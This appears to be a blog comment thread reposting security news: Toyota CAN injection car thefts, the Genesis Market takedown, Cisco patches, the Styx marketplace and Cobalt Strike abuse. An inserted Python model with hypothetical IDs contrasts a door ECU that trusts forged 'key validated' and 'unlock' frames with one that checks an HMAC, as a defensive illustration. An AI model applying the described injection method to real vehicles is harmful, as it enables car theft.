The hacking device is designed to conduct what the researchers call a CAN injection attack. These devices appear to be increasingly used by thieves. At least one theft was caught by CCTV cameras in London.
The researchers analyzed diagnostics data from Tabor’s stolen RAV4 and such a CAN injection device in an effort to see how they work.
Modern cars have several ECUs, each responsible for a different system, such as headlights, climate control, telematics, cameras, engine control, and the smart key that unlocks and starts the vehicle. ECUs are connected together through controller area network (CAN) buses.
The attacker does not need to directly connect to the smart key ECU. Instead, they can reach the smart key ECU from the wires connected to, for example, the headlight, as long as the headlight and the smart key ECU are on the same CAN bus.
The attacker connects the hacking device to the headlight wires and can send a specially crafted CAN message that tells the smart key receiver ECU that the key is validated. The attacker can then send a specially crafted CAN message to the door ECU to unlock the door. This allows the thieves to get in the car and drive away.
The attack can be carried out by connecting the hacking device to other CAN wires as well, but the ones in the headlight are often the most accessible and connecting to them does not involve causing too much damage to the car, which would lower its value.
While in this case the stolen vehicle was a Toyota and the hacking device tested by the researchers is specifically designed for Toyota cars, the problem is not specific to Toyota.
Similar hacking devices offered for sale to car thieves target many brands, including BMW, GMC, Cadillac, Chrysler, Ford, Honda, Jaguar, Jeep, Maserati, Nissan, Peugeot, Renault, and Volkswagen.
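The attack described above works because a classic CAN frame carries an arbitration ID and up to eight data bytes but no indication of which node sent it, so a device spliced into the headlight wiring can emit a "key validated" frame and an "unlock" frame that the receiving ECU cannot distinguish from the smart-key ECU's own. The following is an added example, not code from the article or from Tabor and Tindell's research: a minimal model of a door ECU that trusts frames by ID alone, beside one that requires a fresh counter and a truncated HMAC under a key shared with the genuine sender. All arbitration IDs, payload layouts and keys are hypothetical and are not Toyota's or any manufacturer's.

```python
"""Added example (not from the SecurityWeek article or the researchers' work).

Models the property CAN injection abuses: a frame names an ID and data, but
not its sender, so anything on the bus can impersonate the smart-key ECU.
The authenticated variant shows what a message-authentication layer changes.
All IDs, payload layouts and keys are hypothetical, not Toyota's or any OEM's.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Dict, Optional

ID_KEY_STATUS = 0x1A0  # hypothetical: "smart key validated" status frame
ID_DOOR_CMD = 0x2B0    # hypothetical: door lock/unlock command frame
PAYLOAD_YES = b"\x01"  # first data byte: 1 = validated / unlock


@dataclass(frozen=True)
class CanFrame:
    can_id: int   # 11-bit arbitration ID; nothing here says who sent it
    data: bytes   # 0..8 bytes in classic CAN


class LegacyDoorEcu:
    """Trusts frames by ID alone: anything on the bus saying 'key validated'
    followed by 'unlock' opens the door. This is what the thieves rely on."""

    def __init__(self) -> None:
        self.key_validated = False
        self.unlocked = False

    def on_frame(self, f: CanFrame) -> None:
        if f.can_id == ID_KEY_STATUS and f.data[:1] == PAYLOAD_YES:
            self.key_validated = True
        elif f.can_id == ID_DOOR_CMD and f.data[:1] == PAYLOAD_YES and self.key_validated:
            self.unlocked = True


def auth_tag(key: bytes, can_id: int, counter: int, payload: bytes) -> bytes:
    """Truncated HMAC-SHA256 over (ID, counter, payload); 4 bytes fit in a frame."""
    msg = can_id.to_bytes(2, "big") + counter.to_bytes(3, "big") + payload
    return hmac.new(key, msg, hashlib.sha256).digest()[:4]


def build_auth_frame(key: bytes, can_id: int, counter: int, payload: bytes) -> CanFrame:
    """Hypothetical layout: 1 byte payload | 3 byte counter | 4 byte tag."""
    return CanFrame(can_id, payload + counter.to_bytes(3, "big") + auth_tag(key, can_id, counter, payload))


class AuthenticatedDoorEcu(LegacyDoorEcu):
    """Same state machine, but a frame is honoured only if its tag verifies and
    its counter is strictly newer than the last accepted one for that ID, so a
    forged frame (no key) and a replayed genuine frame are both dropped."""

    def __init__(self, key: bytes) -> None:
        super().__init__()
        self.key = key
        self.last_counter: Dict[int, int] = {}

    def verify(self, f: CanFrame) -> Optional[bytes]:
        if len(f.data) != 8:
            return None
        payload, counter, tag = f.data[:1], int.from_bytes(f.data[1:4], "big"), f.data[4:]
        if counter <= self.last_counter.get(f.can_id, -1):
            return None  # stale or replayed
        if not hmac.compare_digest(tag, auth_tag(self.key, f.can_id, counter, payload)):
            return None  # forged: the sender does not hold the key
        self.last_counter[f.can_id] = counter
        return payload

    def on_frame(self, f: CanFrame) -> None:
        payload = self.verify(f)
        if payload is not None:
            super().on_frame(CanFrame(f.can_id, payload))


def injection_attempt(ecu: LegacyDoorEcu) -> bool:
    """The two-frame sequence the article describes, sent from the headlight
    wires with no key present. Returns whether the door ended up unlocked."""
    ecu.on_frame(CanFrame(ID_KEY_STATUS, PAYLOAD_YES + b"\x00" * 7))
    ecu.on_frame(CanFrame(ID_DOOR_CMD, PAYLOAD_YES + b"\x00" * 7))
    return ecu.unlocked


def genuine_unlock(ecu: AuthenticatedDoorEcu, key: bytes, counter: int) -> bool:
    """What the real smart-key ECU, holding the shared key, would send."""
    ecu.on_frame(build_auth_frame(key, ID_KEY_STATUS, counter, PAYLOAD_YES))
    ecu.on_frame(build_auth_frame(key, ID_DOOR_CMD, counter, PAYLOAD_YES))
    return ecu.unlocked


if __name__ == "__main__":
    key = bytes(range(16))  # hypothetical shared key
    print("legacy ECU, injected frames ->", injection_attempt(LegacyDoorEcu()))
    print("authenticated ECU, injected ->", injection_attempt(AuthenticatedDoorEcu(key)))
    print("authenticated ECU, real key ->", genuine_unlock(AuthenticatedDoorEcu(key), key, 1))
```

The point of the comparison is the trust decision, not the cryptography: the legacy ECU accepts the injected pair because the bus gives it nothing else to check, while the authenticated ECU rejects the same frames because the sender cannot produce a valid tag. Production schemes of this kind also have to solve key provisioning across ECUs, counter resynchronisation and the bus-load cost of the extra bytes, none of which this model addresses.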
Tomi Engdahl says:
Success of Genesis Market Takedown Attempt Called Into Question
https://www.securityweek.com/success-of-genesis-market-takedown-attempt-called-into-question/
Law enforcement announced the takedown of Genesis Market, but the impact on the cybercrime marketplace’s infrastructure may be limited.
Law enforcement agencies in several countries have worked together to disrupt a notorious cybercrime website called Genesis Market, but there is evidence that the takedown attempt’s impact — particularly on infrastructure — may be limited.
Launched in 2018, Genesis is an invite-only marketplace that has been offering so-called ‘bots’ that provide cybercriminals with access to online accounts and systems.
These bots are created using information obtained by malware from infected devices. Each bot contains not only credentials required to access the victim’s accounts, but also device fingerprints (cookies and browser data) that enable hackers to gain access to the desired resource without triggering any alarms because the request appears to be coming from the legitimate user’s device.
Law enforcement agencies in the United States, Europe and Australia announced the results of an operation against Genesis Market on Wednesday. The operation, named ‘Cookie Monster’, involved 17 countries and resulted in roughly 120 arrests and 200 property searches.
Investigators said Genesis has offered data from over 1.5 million compromised computers, totaling more than 80 million account credentials. While many of these credentials are associated with banking, social media and email accounts, some provide access to government systems. The FBI said the site’s operators have earned $8.7 million in cryptocurrency.
Court documents revealed that investigators managed to gain access to backend servers and other infrastructure supporting Genesis, which enabled them to take control of several domains.
While the press releases issued by government and law enforcement agencies describe the action as a takedown, disruption, and dismantlement, the extent of the operation’s impact has been called into question.
More than 100 people have been arrested around the world, but they are likely users of the site rather than administrators.
Cybersecurity firm ZeroFox noted that Genesis Market can still be accessed on Tor and it remains stable and functional. In addition, the site’s administrators announced that they plan on setting up new domains.
Tomi Engdahl says:
Cisco Patches Code and Command Execution Vulnerabilities in Several Products
https://www.securityweek.com/cisco-patches-code-and-command-execution-vulnerabilities-in-several-products/
Cisco has released patches for high-severity vulnerabilities impacting Secure Network Analytics and Identity Services Engine (ISE) products.
Cisco this week announced patches for multiple vulnerabilities across its product portfolio, including high-severity issues impacting its Secure Network Analytics and Identity Services Engine (ISE) products.
Tracked as CVE-2023-20102, the first bug is described as insufficient sanitization of user-provided data parsed into memory. An authenticated, remote attacker could send crafted HTTP requests to an affected device to achieve arbitrary code execution.
Cisco has addressed the vulnerability with the release of Secure Network Analytics 7.4.1-Patch SMC Rollup #5.
The tech giant also announced patches for an improper validation of parameters sent to the restricted shell in Cisco ISE, which could lead to privilege escalation.
Tomi Engdahl says:
Financial Fraud-Focused Cybercrime Marketplace ‘Styx’ Emerges
https://www.securityweek.com/financial-fraud-focused-cybercrime-marketplace-styx-emerges/
Recently identified dark web portal Styx Marketplace focuses on financial fraud, identity theft, and money laundering.
Tomi Engdahl says:
Technical, Legal Action Taken to Prevent Abuse of Cobalt Strike, Microsoft Software
https://www.securityweek.com/technical-legal-action-taken-to-prevent-abuse-of-cobalt-strike-microsoft-software/
Microsoft, Fortra and Health-ISAC have taken legal and technical action to prevent the abuse of the Cobalt Strike exploitation tool and Microsoft software.
Microsoft, cybersecurity firm Fortra, and the Health Information Sharing and Analysis Center (Health-ISAC) have taken legal and technical action in an effort to prevent the abuse of the Cobalt Strike exploitation tool, as well as the abuse of Microsoft software.
Cobalt Strike is a legitimate post-exploitation tool designed by Fortra for adversary simulation. While the company has been trying to prevent the abuse of its product, including by verifying the customers it’s sold to, threat actors have found ways to create cracked copies — typically older versions of the software — and abuse them in their malicious operations.
Cobalt Strike has been widely abused, including by profit-driven cybercriminals that run ransomware operations and state-sponsored threat groups associated with China, Russia, Iran and Vietnam.